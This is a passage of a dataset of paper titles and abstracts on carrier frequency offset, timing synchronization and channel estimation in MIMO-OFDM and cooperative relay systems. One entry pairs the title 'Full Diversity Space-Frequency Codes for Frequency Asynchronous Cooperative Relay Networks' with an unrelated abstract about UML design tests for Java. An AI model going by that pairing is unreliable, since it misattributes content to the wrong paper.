frequency estimation for each pilot subset, a robust IFO estimation scheme is derived. The simulation results show that the proposed method can provide benefit to the overall system performance . --- paper_title: A practical equalizer for cooperative delay diversity with multiple carrier frequency Offsets paper_content: Cooperative transmission in wireless networks provides diversity gain in multipath fading environments. Among all the proposed cooperative transmission schemes, delay diversity has the advantage of needing less coordination and higher spectrum efficiency. However, in a distributed network, the asynchrony comes from both carrier frequency and symbol timing between the cooperating relays. In this paper, a minimum mean square error fractionally spaced decision feedback equalizer (MMSE-FS-DFE) is developed to extract the diversity with large multiple carrier frequency offsets, its performance approaches the case without multiple carrier frequency offsets. The front end design for the receiver in this scenario is discussed, and a practical frame structure is designed for carrier frequency offsets and channel estimation. A subblock-wise decision-directed adaptive least squares (LS) estimation method is developed to solve the problem caused by error in frequency offset estimation. The purpose of this paper is to provide a practical design for cooperative transmission (CT) with the delay diversity scheme. --- paper_title: FADAC-OFDM: Frequency-Asynchronous Distributed Alamouti-Coded OFDM paper_content: We propose frequency-asynchronous distributed Alamouti-coded orthogonal frequency-division multiplexing (FADAC-OFDM). The proposed scheme effectively mitigates the intercarrier interference (ICI) due to frequency offset (FO) between two distributed antennas. The transmitter side of the proposed scheme transmits each of the two subslots in Alamouti code through two remote subcarriers symmetric to the center frequency and is referred to as space–frequency reversal schemes by Wang et al. or Choi. The receiver side of the proposed scheme is significantly different from the conventional scheme or the scheme proposed by Wang et al. in that it performs two discrete Fourier transform (DFT), each of which is synchronized to each transmit antenna's carrier frequency. The decision variables are generated by performing a simple linear combining with the same complexity as that of the conventional Alamouti code. The derivation shows that in flat-fading channels, the dominant ICI components due to FO cancel each other during the combining process. The proposed scheme achieves almost the same performance as the ideal Alamouti scheme, even with large FO. To use this ICI self-cancellation property for selective fading channels or in cases with timing offset (TO) between two transmit antennas, the total subcarriers are divided into several subblocks, and the proposed scheme is applied to each subblock. For mildly selective channels or cases with practically small TO, the proposed scheme achieves significantly improved performance compared with the conventional space–frequency Alamouti-coded OFDM. --- paper_title: Carrier frequency synchronization in the downlink of 3GPP LTE paper_content: In this paper, we investigate carrier frequency synchronization in the downlink of 3GPP Long Term Evolution (LTE). A complete carrier frequency offset estimation and compensation scheme based on standardized synchronization signals and reference symbols is presented. The estimation performance in terms of mean square error is derived analytically and compared to simulation results. The impact of estimation error on the system performance is shown in terms of uncoded bit error ratio and physical layer coded throughput. Compared to perfect synchronization, the presented maximum likelihood estimator shows hardly any performance loss, even when the most sophisticated MIMO schemes of LTE are employed. --- paper_title: Maximum likelihood algorithms for joint estimation of synchronisation impairments and channel in multiple input multiple output–orthogonal frequency division multiplexing system paper_content: Maximum likelihood (ML) algorithms, for the joint estimation of synchronisation impairments and channel in multiple input multiple output–orthogonal frequency division multiplexing (MIMO–OFDM) system, are investigated in this work. A system model that takes into account the effects of carrier frequency offset, sampling frequency offset, symbol timing error and channel impulse response is formulated. Cramer–Rao lower bounds for the estimation of continuous parameters are derived, which show the coupling effect among different impairments and the significance of the joint estimation. The authors propose an ML algorithm for the estimation of synchronisation impairments and channel together, using the grid search method. To reduce the complexity of the joint grid search in the ML algorithm, a modified ML (MML) algorithm with multiple one-dimensional searches is also proposed. Further, a stage-wise ML (SML) algorithm using existing algorithms, which estimate less number of parameters, is also proposed. Performance of the estimation algorithms is studied through numerical simulations and it is found that the proposed ML and MML algorithms exhibit better performance than SML algorithm. --- paper_title: Joint AOD and CFO estimation in wireless sensor networks localization system paper_content: Self-localization system of wireless sensor networks based on angle of departure (AOD) is studied in this paper. In AOD model, anchor node with multi-antenna transmits orthogonal pilot signals to sensor node with single antenna, which entitles the sensor node to function as equipping multi-antenna. Given that the limited number of antenna at anchor nodes will result in degree of freedom (DOF) deficiency at sensor node when dealing with more multipath components (MPC), we adopt a novel method without requiring extra antennas. The proposed algorithm simultaneously includes the oscillator mismatch between anchor node and sensor node, i.e., carrier frequency offset (CFO). With the aid of anchor's movement and CFO, the equivalent antenna array at sensor node is expended by synthetic aperture procedure to a much larger one, which subsequently improve the estimation ability to MPCs. In addition, the close-form solutions of CFO and AOD are also derived. The effectiveness and performance of proposed algorithm are demonstrated by numerical simulations. --- paper_title: Classification of Space-Time Block Codes Based on Second-Order Cyclostationarity with Transmission Impairments paper_content: Signal classification is important in various commercial and military applications. Multiple antenna systems complicate the signal classification problem since there is now the issue of estimating the number and configuration of transmit antennas. The novel blind classification algorithm proposed in this paper exploits the cyclostationarity property of space-time block codes (STBCs) for the classification of multiple antenna systems in the presence of possible transmission impairments. Analytical expressions for the second-order cyclic statistics used as the basis of the algorithm are derived, and the computational cost of the proposed algorithm is considered. This algorithm avoids the need for a priori knowledge of the channel coefficients, modulation, carrier phase, and timing offsets. Moreover, it does not need accurate information about the transmission data rate and carrier frequency offset. Monte Carlo simulation results demonstrate a good classification performance with low sensitivity to phase noise and channel effects, including frequency-selective fading and Doppler shift. --- paper_title: A Novel Algebraic Carrier Frequency Offset Estimator for ASTC-MIMO-OFDM Systems Over a Correlated Frequency-Selective Channel paper_content: This paper presents a new algebraic carrier frequency offset (CFO) estimation technique for multiple-input-multiple-output (MIMO) orthogonal frequency-division multiplexing (OFDM) system, to overcome the sensitivity of algebraic space-time codes (ASTCs) to frequency synchronization in quasi-static correlated Rayleigh frequency-selective fading channels. The technique uses a preamble and is thus particularly suitable for burst-mode communications. The preamble consists of orthogonal training sequences that are simultaneously transmitted from the various transmit antennas. The proposed system exploits all subcarriers in the frequency domain, which provides a remarkable performance improvement, and reaches the Cramer-Rao lower bound (CRLB) at a high signal-to-noise ratio. The proposed method is compared with three known CFO estimators in the literature: Cyclic-Prefix-based (CP), Moose, and Classen techniques that show clear advantages. --- paper_title: Blind carrier frequency offset estimator for multi-input multi-output-orthogonal frequency division multiplexing systems over frequency-selective fading channels paper_content: This study presents a new blind carrier frequency offset (CFO) estimation technique for multi-input multi-output (MIMO) orthogonal frequency division multiplexing (OFDM) systems employing space-time coding (STC). CFO estimation is crucial for OFDM systems to avoid the performance degradation because of the inter-carrier interference that results when the CFO is not estimated and compensated accurately. Based on the assumptions that the data symbols are selected from a constant modulus constellation and the channel is varying slowly over time, a new blind CFO estimator is proposed by minimising the power difference between all subcarriers in two consecutive STC blocks. Therefore the proposed system exploits all subcarriers in time and frequency domain, which provides a remarkable performance improvement over other techniques reported in the literature. The complexity of the proposed estimator is substantially reduced by approximating the cost function by a sinusoid that can be minimised using direct closed-form computations within one OFDM symbol period. Monte Carlo simulations are used to assess the performance of the proposed system by means of mean squared error (MSE) in both static and time-varying frequency-selective fading channels. The simulation results demonstrate that the proposed estimator can eliminate the MSE error floors that usually appear at moderate and high signal-to-noise ratios for the estimators that work only in frequency domain. --- paper_title: A Compact Preamble Design for Synchronization in Distributed MIMO OFDM Systems paper_content: In distributed multiple input multiple output (MIMO) orthogonal frequency division multiplexing (OFDM) systems, signals arrive at the receiver on different timing and are characterized by distinct carrier frequency offsets (CFOs), which makes synchronization rather challenging than that associated with centralized MIMO systems. Current solutions to this problem are mainly based on special preamble designs, where different training sequences are cascaded and then separately used to assist timing synchronization and CFO estimation. Such preamble designs not only increase system overhead but also burden the receivers with independent algorithms for timing synchronization and CFO estimation. In this paper, we propose a low-overhead (compact) preamble having the same length as one OFDM symbol, along with a unified algorithm for both timing synchronization and CFO estimation. Furthermore, the CFO estimation range can be flexibly extended to cope with larger CFOs in the proposed approach. Under the same training overhead and power consumption, simulation results indicate that the proposed approach outperforms a timing synchronization scheme that based on unequal period synchronization patterns. --- paper_title: Semi-blind MIMO OFDM systems with precoding aided CFO estimation and ICA based equalization paper_content: We propose a semi-blind multiple-input multiple-output (MIMO) orthogonal frequency division multiplexing (OFDM) system, with a precoding aided carrier frequency offset (CFO) estimation approach, and an independent component analysis (ICA) based equalization structure. A number of reference data sequences are carefully designed offline and are superimposed to source data via a non-redundant linear precoding process, which can kill two birds with one stone, without introducing any extra total transmit power and spectral overhead. First, the reference data sequences are selected from a pool of carefully designed orthogonal sequences. The CFO estimation is to minimize the sum cross-correlation between the CFO compensated signals and the rest orthogonal sequences in the pool. Second, the same reference data enable elimination of the permutation and quadrant ambiguity in the ICA equalized signals by maximizing the cross-correlation between the ICA equalized signals and the reference data. Simulation results show that, without extra bandwidth and power needed, the proposed semi-blind system achieves a bit error rate (BER) performance close to the ideal case with perfect channel state information (CSI) and no CFO. Also, the precoding aided CFO estimation outperforms the constant amplitude zero autocorrelation (CAZAC) sequences based CFO estimation approach, with no spectral overhead. --- paper_title: Linear Least Squares CFO Estimation and Kalman Filtering Based I/Q Imbalance Compensation in MIMO SC-FDE Systems paper_content: This paper investigates carrier frequency offset (CFO) estimation and inphase/quadrature (I/Q) imbalance compensation in time-varying frequency-selective channels. We first propose a linear least squares (LLS) CFO estimation approach which has a lower complexity and a higher accuracy than the previous nonlinear CFO estimation methods. We then propose a Kalman filtering based I/Q imbalance compensation approach in the presence of CFO, which demonstrates a good ability to track the channel time variations with a fast convergence speed, by nulling the cyclic prefix (CP) and including the CFO in the state vector of the equivalent channel model. The proposed Kalman filtering based I/Q imbalance compensation approach with associated equalization tracks the time variation with a fast convergence speed. Simulation results show that the proposed compensation approach for CFO and I/Q imbalance provides a bit error rate (BER) performance close to the ideal case with perfect channel state information (CSI), no CFO and no I/Q imbalance. --- paper_title: Reduced-complexity baseband compensation of joint Tx/Rx I/Q imbalance in mobile MIMO-OFDM paper_content: Direct-conversion multiple-input multiple-output orthogonal frequency division multiplexing (MIMO-OFDM) transceivers enjoy high data rates and reliability at practical implementation complexity. However, analog front-end impairments such as I/Q imbalance and high mobility requirements of next-generation broadband wireless standards result in performance-limiting inter-carrier interference (ICI). In this paper, we study the effects of ICI due to these impairments for OFDM with space frequency block codes and spatial multiplexing, derive a generalized linear model and propose a non-iterative reduced-complexity digital baseband joint compensation scheme. Furthermore, we present a pilot scheme for joint estimation of the channel and the I/Q imbalance parameters and evaluate its performance through simulations. Our proposed scheme is effective in estimating and compensating for frequency-independent and frequency-dependent transmit and receive I/Q imbalances even in the presence of a residual frequency offset. --- paper_title: Iterative Receiver Design With Joint Doubly Selective Channel and CFO Estimation for Coded MIMO-OFDM Transmissions paper_content: This paper is concerned with the problem of turbo (iterative) processing for joint channel and carrier frequency offset (CFO) estimation and soft decoding in coded multiple-input-multiple-output (MIMO) orthogonal frequency-division-multiplexing (OFDM) systems over time- and frequency-selective (doubly selective) channels. In doubly selective channel modeling, a basis expansion model (BEM) is deployed as a fitting parametric model to reduce the number of channel parameters to be estimated. Under pilot-aided Bayesian estimation, CFO and BEM coefficients are treated as random variables to be estimated by the maximum a posteriori technique. To attain better estimation performance without sacrificing spectral efficiency, soft bit information from a soft-input-soft-output (SISO) decoder is exploited in computing soft estimates of data symbols to function as pilots. These additional pilot signals, together with the original signals, can help to enhance the accuracy of channel and CFO estimates for the next iteration of SISO decoding. The resulting turbo estimation and decoding performance is enhanced in a progressive manner by benefiting from the iterative extrinsic information exchange in the receiver. Both extrinsic information transfer chart analysis and numerical results show that the iterative receiver performance is able to converge fast and close to the ideal performance using perfect CFO and channel estimates. --- paper_title: An Efficient Time Synchronization Scheme for Broadband Two-Way Relaying Networks Based on Physical-Layer Network Coding paper_content: We present an efficient time synchronization scheme for broadband two-way relaying networks based on two-phase physical layer network coding. Especially, a preamble structure is proposed in this letter for the synchronization. The synchronization approach exploits the preamble in frequency domain and time domain to effectively separate the mixed signals, and jointly estimate timing-offsets and channel parameters, respectively. Numerical results confirm that the suggested method is superior to the conventional scheme, and is very suitable for the synchronization in broadband two-way relaying networks based on two-phase physical layer network coding. --- paper_title: One-Shot Blind CFO and Channel Estimation for OFDM With Multi-Antenna Receiver paper_content: In this paper, we design a new blind joint carrier frequency offset (CFO) and channel estimation method for orthogonal frequency-division multiplexing (OFDM) with multiantenna receiver. The proposed algorithm requires only one received OFDM block and thus belongs to the category of one-shot estimation methods. Other advantages of the proposed algorithm include 1) it supports fully loaded data carriers and is thus spectral efficient; 2) the channel from the transmitter to each receive antenna can be blindly estimated with only a scaling ambiguity; and 3) the algorithms outperforms the existing methods. Moreover, we derive the Cramer-Rao Bounds (CRB) of joint CFO and channel estimation in closed forms. Numeral results not only show the effectiveness of the proposed algorithm but also demonstrate its closed performance to CRB. --- paper_title: Fast Kalman Equalization for Time-Frequency Asynchronous Cooperative Relay Networks With Distributed Space-Time Codes paper_content: Cooperative relay networks are inherently time and frequency asynchronous due to their distributed nature. In this correspondence, we propose a transceiver scheme to combat both time and frequency offsets for cooperative relay networks with multiple relay nodes. At the relay nodes, a distributed linear convolutive space-time coding is adopted, which has the following advantages: 1) Full cooperative diversity can be achieved using a minimum mean square error (MMSE) or MMSE decision feedback equalizer (MMSE-DFE) detector, instead of a maximum-likelihood receiver when only time asynchronism exists. 2) The resultant equivalent channel possesses some special structure, which can be exploited to reduce the equalization complexity at the destination node. By taking full advantage of such a special structure, fast Kalman equalizations based on linear MMSE and MMSE-DFE are proposed for the receiver, where the estimation of the state vector (information symbols) can be recursively taken and become very computationally efficient, compared with direct equalization. The proposed scheme can achieve considerable diversity gain with both time and frequency offsets and applies to frequency-selective fading channels. --- paper_title: Improved CIR-Based Receiver Design for DVB-T2 System in Large Delay Spread Channels: Synchronization and Equalization paper_content: This paper proposes to implement an improved orthogonal frequency division multiplexing (OFDM) receiver by utilizing a channel impulse response (CIR)-based synchronization and sparse equalization for DVB-T2 system operating in both the single-input single-output (SISO) and multi-input single-output (MISO) transmission modes. First, the proposed OFDM receiver performs a pilot-aided CIR estimation after a coarse symbol timing recovery (STR). Then, the proposed CIR-based fine STR compensates for a false symbol timing offset (STO). In particular, the fine STR resolves an ambiguity effect of CIR, which is the main problem caused by a false coarse STO in exploiting the CIR. Upon the completion of the fine synchronization, the proposed CIR-based sparse equalization is performed in order to minimize the noise and interference effects by shifting or selecting a basic frequency interpolation (FI) filter according to an echo delay (phase) or maximum delay spread, respectively. Performance evaluations are accomplished in large delay spread channels in which the maximum delay spread is less or longer than a guard interval (GI). It is shown that the proposed receiver is not only capable of estimating the fine STO but also minimizing effectively the noise effects. In particular, the performance gain in a single pre-echo channel being longer than GI is remarkable as compared with a conventional receiver. --- paper_title: Joint maximum-likelihood estimation of frequency offset and channel coefficients in multiple-input multiple-output orthogonal frequency-division multiplexing systems with timing ambiguity paper_content: In this study, the authors consider a multiple-input multiple-output (MIMO) orthogonal frequency-division multiplexing system operating over unknown frequency-selective fading channels. Based on two different signal models, two maximum-likelihood schemes for joint carrier frequency offset (CFO) and MIMO channel estimation under timing ambiguity have been derived. The first estimator jointly estimates the timing offset, CFO and channel coefficients, but the complexity is high owing to the need of two-dimensional searches. The second estimator has a reduced complexity, but its performance slightly degrades compared with the first one. The performance of proposed estimators was benchmarked with Cramer–Rao bounds (CRB), and investigated by computer simulations. The simulation results show that the proposed estimators achieve almost ideal performances compared with the CRB. --- paper_title: Semiblind Iterative Receiver for Coded MIMO-OFDM Systems paper_content: In this paper, a semiblind iterative receiver is proposed for coded multiple-input-multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) systems. A novel iterative extended soft-recursive least square (IES-RLS) estimator for joint channel and frequency offset estimation is introduced. Extrinsic bit information obtained from the channel decoder and expected symbol decisions obtained from the demodulator are simultaneously exploited by the IES-RLS. The proposed receiver combines the MIMO data demodulator, the proposed channel estimator, and the channel decoder in an iterative manner to yield an improved bit error rate (BER) performance. To arrive at a feasible algorithm, the first-order linearization of the received vector signal with respect to the frequency offset is used in the IES-RLS channel estimator. The BER performance, a constellation-constrained mutual information analysis, and an EXIT chart analysis are used to verify the effectiveness of the proposed receiver. Simulation results show the superiority of the proposed semiblind receiver, compared with conventional semiblind receivers. --- paper_title: Fractional timing offset and channel estimation for MIMO OFDM systems over flat fading channels paper_content: This paper addresses the problem of fractional timing offset and channel estimation in Multiple input Multiple output orthogonal frequency division multiplexing (MIMO OFDM) systems. The estimators have been derived assuming a flat fading channel and using the maximum likelihood criterion. Closed form Cramer Rao bound (CRB) expressions for fractional timing offset and channel response are also derived. Simulation results have been used to cross-check the accuracy of the proposed estimation algorithm. --- paper_title: Parameter Estimation and Tracking in Physical Layer Network Coding paper_content: In this paper, we present an algorithm for joint decoding of the modulo-2 sum of the bits transmitted from two unsynchronized transmitters using Physical Layer Network Coding (PLNC). We address the problems that arise when the boundaries of the signals do not align with each other and when the channel parameters are slowly varying and are not known to the receiver at the relay node. Our approach first estimates jointly the timing and fading gains of both the signals, and uses a state-based Viterbi decoding scheme that takes into account the timing offsets between the interfering signals. We also track the amplitude and phase of the channel which may be slowly varying. Simulation results demonstrate the sensitivity of the detection performance at the relay node to the relative offset of the timings of the two user's signals as well as the advantage of our algorithm over previously published algorithms. --- paper_title: Blind timing and carrier synchronisation in distributed multiple input multiple output communication systems paper_content: This study addresses the problem of joint blind timing and carrier synchronisation in a (distributed-M ) × N antenna system where the objective is to estimate the M carrier offsets, the M timing offsets and to recover the transmitted symbols for each of the M users given only the measured signal at the N antennas of the receiver. The authors propose a modular receiver structure that exploits blind source separation to reduce the problem into more tractable sub-problems of estimating individual timing and carrier offsets for multiple users. This leads to a robust solution of low complexity. The authors investigate the performance of the estimators analytically using modified Cramer- Rao bounds and computer simulations. The results show that the proposed receiver exhibits robust performance over a wide range of parameter values, even with worst-case Doppler of 200- 300 Hz and frame size as small as 400 symbols. This work is relevant to future wireless networks and is a complete solution to the problem of estimating multiple timing and carrier offsets in distributed multiple input multiple output (MIMO) communication systems. --- paper_title: Preamble Based Joint CFO, Frequency-Selective I/Q-Imbalance and Channel Estimation and Compensation in MIMO OFDM Systems paper_content: A very promising technical approach for future wireless communication systems is to combine MIMO OFDM and Direct (up/down) Conversion Architecture (DCA). However, while OFDM is sensitive to Carrier Frequency Offset (CFO), DCA is sensitive to I/Q-imbalance. Such RF impairments can seriously degrade the system performance. For the compensation of these impairments, a preamble-based scheme is proposed in this paper for the joint estimation of CFO, transmitter (Tx) and receiver (Rx) frequency-selective I/Q-imbalance and the MIMO channel. This preamble is constructed both in time- and frequency domain and requires much less overhead than the existing designs. Moreover, Closed-Form Estimators (CLFE) are allowed, enabling efficient implementation. The advantages and effectiveness of the proposed scheme have been verified by numerical simulations. --- paper_title: Iterative Joint Estimation Procedure for Channel and Frequency Offset in Multi-Antenna OFDM Systems With an Insufficient Cyclic Prefix paper_content: This paper addresses a strategy to improve the joint channel and frequency offset (FO) estimation in multi-antenna systems, widely known as multiple-input-multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM), in the presence of intersymbol interference (ISI) and intercarrier interference (ICI) occasioned by an insufficient cyclic prefix (CP). The enhancement is attained by the use of an iterative joint estimation procedure (IJEP) that successively cancels the interferences located in the preamble of the OFDM frame, which is used for the joint estimation and initially contains the interferences due to a CP shorter than the channel length. The IJEP requires at certain steps a proper iterative interference cancellation algorithm, which makes use of an initial FO compensation and channel estimation obtained due to the use of a symmetric sequence in the preamble. After the iterative cancellation of interferences, the procedure performs an additional joint channel and FO estimation whose mean square error converges to the Cramér-Rao bound (CRB). Later on, this subsequent joint estimation permits the removal of the interferences in the data part of the frame, which are also due to an insufficient CP, in the same iterative fashion but saving iterations compared with the use of other estimation strategies. The appraisal of the procedure has been performed by assessing the convergence of the simulated estimators to the CRB as a function of the number of iterations. Additionally, simulations for the evaluation of the bit error rate (BER) have been carried out to probe how the utilization of the proposed IJEP clearly improves the performance of the system. It is concluded that, with a reduced number of iterations in the preamble, the IJEP converges to the theoretical bounds, thus reducing the disturbances caused by a hard wireless channel or a deliberately insufficient CP. Therefore, this eases the interference cancellation in the data part, leading to an improvement in the BER that approximates to the ideal case of a sufficient CP and, consequently, an improvement in the computational cost of the whole procedure that has been analyzed. --- paper_title: Joint CFO and Channel Estimation for Asynchronous Cooperative Communication Systems paper_content: This letter addresses the joint maximum likelihood carrier frequency offset (CFO) and channel estimation for asynchronous cooperative communication systems. We first present a space-alternating generalized expectation-maximization (SAGE) based iterative estimator (SAGE-IE). Then a low-complexity approximate SAGE-IE (A-SAGE-IE) is developed. Our proposed algorithms decouple the multi-dimensional optimization problem into many one-dimensional optimization problems where the CFO and channel coefficients of each relay-destination link can be determined separately. Simulations indicate that, even though timing offsets are present, the proposed estimators can asymptotically achieve the Cramer-Rao bround (CRB) for the perfectly timing synchronized case. --- paper_title: Integer frequency offset estimation by pilot subset selection for OFDM system with CDD paper_content: Cyclic delay diversity (CDD) is a simple transmit diversity technique for an OFDM system using multiple transmit antennas. However, the performance of post-FFT estimation, i.e. integer frequency offset (IFO) is deteriorated by high frequency selectivity introduced by CDD. Proposed is an IFO estimation scheme for an OFDM system with CDD. Based on the pilot subset partitioning, the proposed IFO estimation scheme reduces the effect of frequency selective fading by adopting the CDD. --- paper_title: Joint estimation of Carrier and Sampling Frequency Offset, phase noise, IQ Offset and MIMO channel for LTE Advanced UL MIMO paper_content: In LTE Advanced Uplink MIMO the pilot symbols on a subcarrier and OFDM symbol are not transmitted exclusively by one layer. If the pilots are transmitted exclusively, like in LTE Advanced Downlink or Mobile WiMAX, the estimation of Carrier Frequency Offset (CFO) and Sampling Frequency Offset (SFO) can be based on correlating two pilot symbols at different OFDM symbols. In addition the estimation of CFO / SFO can be performed separately from IQ Offset and channel estimation. In LTE Advanced Uplink (UL) the pilot symbols on a subcarrier and OFDM symbol are transmitted by all layers simultaneously. As the received symbol consists of the sum of all transmitted pilot symbols, the CFO / SFO estimation approaches used for SISO seem not applicable anymore. This paper introduces a joint estimation of carrier and sampling frequency offset, phase noise, IQ offset and MIMO channel for LTE Advanced UL MIMO. --- paper_title: E2KF based joint multiple CFOs and channel estimate for MIMO-OFDM systems over high mobility scenarios paper_content: An enhanced extended Kalman filtering (E2KF) algorithm is proposed in this paper to cope with the joint multiple carrier frequency offsets (CFOs) and time-variant channel estimate for MIMO-OFDM systems over high mobility scenarios. It is unveiled that, the auto-regressive (AR) model not only provides an effective method to capture the dynamics of the channel parameters, which enables the prediction capability in the EKF algorithm, but also suggests an method to incorporate multiple successive pilot symbols for the improved measurement update. --- paper_title: Channel Equalization and Symbol Detection for Single-Carrier MIMO Systems in the Presence of Multiple Carrier Frequency Offsets paper_content: A new frequency-domain channel equalization and symbol detection scheme is proposed for multiple-input-multiple-output (MIMO) single-carrier broadband wireless systems in the presence of severely frequency-selective channel fading and multiple unknown carrier-frequency offsets (CFOs). Multiple CFOs cause severe phase distortion in the equalized data for large block lengths and/or constellation sizes, thus yielding poor detection performance. Instead of explicitly estimating the CFOs and then compensating them, the proposed scheme estimates the rotated phases (not frequencies) caused by multiple unknown CFOs and then removes the phase rotations from the equalized data before symbol detection. The estimation accuracy of the phase rotation is improved by utilizing a groupwise method rather than symbol-by-symbol methods. This paper differs from other related work in orthogonal frequency division multiplexing (OFDM) studies in that it can combat multiple CFOs that are time varying within each block. Numerical examples for 4 × 2 and 8 × 4 single-carrier systems with quaternary phase-shift keying (QPSK) and eight-phase-shift keying (8PSK) modulation illustrate the effectiveness of the proposed scheme in terms of scatter plots of constellation, mean square error (MSE), and bit error rate (BER). --- paper_title: Joint Carrier Frequency Offset and Channel Estimation for MIMO-OFDM Systems Using Extended H_{∞} Filter paper_content: We address the problem of joint carrier frequency offset (CFO) and channel estimation for multiple-input multiple-output (MIMO) orthogonal frequency-division multiplexing (OFDM) systems over time-varying channels. The CFOs between different pairs of transmit and receive antennas are considered to be different. The method is derived based on the extended H∞ filter (EHF). Compared to the conventional extended Kalman filter (EKF)-based method, the EHF-based method does not require any knowledge of the noise distributions, so it is more flexible and robust to the unknown disturbances. Simulation results are provided to illustrate the performance of this method. --- paper_title: Diversity analysis of distributed linear convolutive space-time codes for time-frequency asynchronous cooperative networks paper_content: This study analyses the achievable cooperative diversity order of the distributed linear convolutional space-time coding (DLC-STC) scheme for time–frequency asynchronous cooperative networks. The authors first prove that perfect time or frequency synchronisation is impractical for cooperative networks with multiple relays serving multiple destinations even when the relays know all accurate time delays and frequency offsets. Then the DLC-STC scheme, in which the exact time synchronisation at the relay nodes is unnecessary, is introduced into this type of cooperative networks. This study proves that the achievable time–frequency asynchronous cooperative diversity order of the DLC-STC scheme with maximum-likelihood receivers is equal to the number of relays. Simulation results verify the analysis. --- paper_title: An efficient algorithm for space-time block code classification paper_content: This paper proposes a novel and efficient algorithm for space-time block code (STBC) classification, when a single antenna is employed at the receiver. The algorithm exploits the discriminating features provided by the discrete Fourier transform (DFT) of the fourth-order lag products (FOLPs) of the received signal. It does not require estimation of the channel, signal-to-noise ratio (SNR), and modulation of the transmitted signal. Computer simulations are conducted to evaluate the performance of the proposed algorithm. The results show the validity of the algorithm, its robustness to carrier frequency offset, and low sensitivity to timing offset. --- paper_title: Timing Estimation and Resynchronization for Amplify-and-Forward Communication Systems paper_content: This paper proposes a general framework to effectively estimate the unknown timing and channel parameters, as well as design efficient timing resynchronization algorithms for asynchronous amplify-and-forward (AF) cooperative communication systems. In order to obtain reliable timing and channel parameters, a least squares (LS) estimator is proposed for initial estimation and an iterative maximum-likelihood (ML) estimator is derived to refine the LS estimates. Furthermore, a timing and channel uncertainty analysis based on the Crame?r-Rao bounds (CRB) is presented to provide insights into the system uncertainties resulted from estimation. Using the parameter estimates and uncertainty information in our analysis, timing resynchronization algorithms that are robust to estimation errors are designed jointly at the relays and the destination. The proposed framework is developed for different AF systems with varying degrees of timing misalignment and channel uncertainties and is numerically shown to provide excellent performances that approach the synchronized case with perfect channel information. --- paper_title: Joint estimation and suppression of phase noise and carrier frequency offset in multiple-input multiple-output single carrier frequency division multiple access with single-carrier space frequency block coding paper_content: Carrier frequency offset (CFO) and phase noise are challenging problems in single carrier frequency division multiple access (SC-FDMA) system. In this study, the authors have studied single-carrier space frequency block coding (SC-SFBC) to reduce the peak to average power ratio (PAPR) of the multiple-input multiple-output (MIMO) SC-FDMA signal, in which Alamouti SFBC will change the signal spectrum structure, break the single-carrier property and increase PAPR. Also, the authors propose a joint algorithm to suppress the inter-carrier interference (ICI) caused by phase noise and CFO. Conventional methods are to estimate phase noise and CFO in other algorithms, which are pretty difficult and complicated to obtain accurate estimation results. Unlike the conventional works, the novelty of the authors proposed algorithm is that it directly calculates the interference components and then reconstructs the ICI matrix. Thus, it avoids the degrading interactions between phase noise and CFO estimations. The proposed algorithm exploits block-type pilot, which is a common pilot pattern in SC-FDMA communications and is used in other wireless communication standards. Simulation results show that the suppression performance keeps smooth while phase noise and CFO varies, and BER performance degradation can be significantly reduced in 3 dB. --- paper_title: Full Diversity Space-Frequency Codes for Frequency Asynchronous Cooperative Relay Networks with Linear Receivers paper_content: In a previous work, we presented a technique that allows verifying the conformance between Java implementations and UML class diagrams, using design tests. While it allowed verifying conformance it does so in a sense that does not deal adequately with some design patterns. In such scenarios, there are semantic constraints among the involved elements that UML does not allow our technique to recognize them. Therefore, if one evolves the implementation violating the design pattern, the generated design tests will no longer be capable of detecting the design violation. To address this problem, we propose in this paper an approach based on: (1) UML profiles to explicitly tag UML incorporating design patterns; and (2) a set of design test templates able to recognize the appropriate implementation of these design patterns on Java code. We also present a prototype capable of automatically generating the design tests to verify the design patterns explicated by the UML profile. --- paper_title: Blind Maximum Likelihood Carrier Frequency Offset Estimation for OFDM With Multi-Antenna Receiver paper_content: In this paper, based on the maximum likelihood (ML) criterion, we propose a blind carrier frequency offset (CFO) estimation method for orthogonal frequency division multiplexing (OFDM) with multi-antenna receiver. We find that the blind ML solution in this situation is quite different from the case of single antenna receiver. As compared to the conventional MUSIC-like CFO searching algorithm, our proposed method not only has the advantage of being applicable to fully loaded systems, but also can achieve much better performance in the presence of null subcarriers. It is demonstrated that the proposed method also outperforms several existing estimators designed for multi-antenna receivers. The theoretical performance analysis and numerical results are provided, both of which demonstrate that the proposed method can achieve the Cramer-Rao bound (CRB) under the high signal-to-noise ratio (SNR) region. --- paper_title: Joint Semi-Blind Channel Estimation and Synchronization in Two-Way Relay Networks paper_content: In this paper, we propose a synchronization and channel estimation method for amplify-and-forward two-way relay networks (AF-TWRNs) based on a low-complexity maximum-likelihood (LCML) algorithm and a joint synchronization and channel estimation (JSCE) algorithm. For synchronous AF-TWRNs, the LCML algorithm blindly estimates general nonreciprocal flat-fading channels. We formulate the channel estimation as a convex optimization problem and obtain a closed-form channel estimator. Based on the mean square error (MSE) analysis of the LCML algorithm, we propose a generalized LCML (GLCML) algorithm to perform channel estimation in the presence of the timing offset. Based on the approximation of the LCML algorithm, the JSCE algorithm is proposed to estimate jointly the timing offset and channel parameters. The theoretical analysis shows that the closed-form LCML channel estimator is consistent and unbiased. The analytical MSE expression shows that the estimation error approaches zero in scenarios with either a high signal-to-noise ratio (SNR) or a large frame length. Monte Carlo simulations are employed to verify the theoretical MSE analysis of the LCML algorithm. In the absence of perfect timing synchronization, the GLCML algorithm selects an estimation sample, which produces the optimal channel estimation, according to the MSE analysis. Simulation results also demonstrate that the JSCE algorithm is able to achieve accurate timing offset estimation. --- paper_title: Differential modulation for amplify-and-forward two-way relaying with carrier offsets paper_content: In this paper, differential modulation (DM) schemes, including single differential and double differential, are proposed for amplify-and-forward two-way relaying (TWR) networks with unknown channel state information (CSI) and carrier frequency offsets. Most existing work in TWR assumes perfect channel knowledge at all nodes and no carrier offsets. However, accurate CSI can be difficult to obtain for fast varying channels while increases computational complexity in channel estimation, and commonly existing carrier offsets can greatly degrade the system performance. Therefore, we propose two schemes to remove the effect of unknown frequency offsets for TWR networks, when neither the sources nor the relay has any knowledge of CSI. Simulation results show that the proposed differential modulation schemes are both effective in overcoming the impact of carrier offsets with linear computational complexity. --- paper_title: Effective Symbol Timing Recovery Based on Pilot-Aided Channel Estimation for MISO Transmission Mode of DVB-T2 System paper_content: This paper proposes an effective symbol timing recovery (STR) based on a pilot-aided channel impulse response (CIR) estimation for multi-input single-output (MISO) transmission mode of DVB-T2 system. In particular, this paper focuses on fine STR capable of resolving an 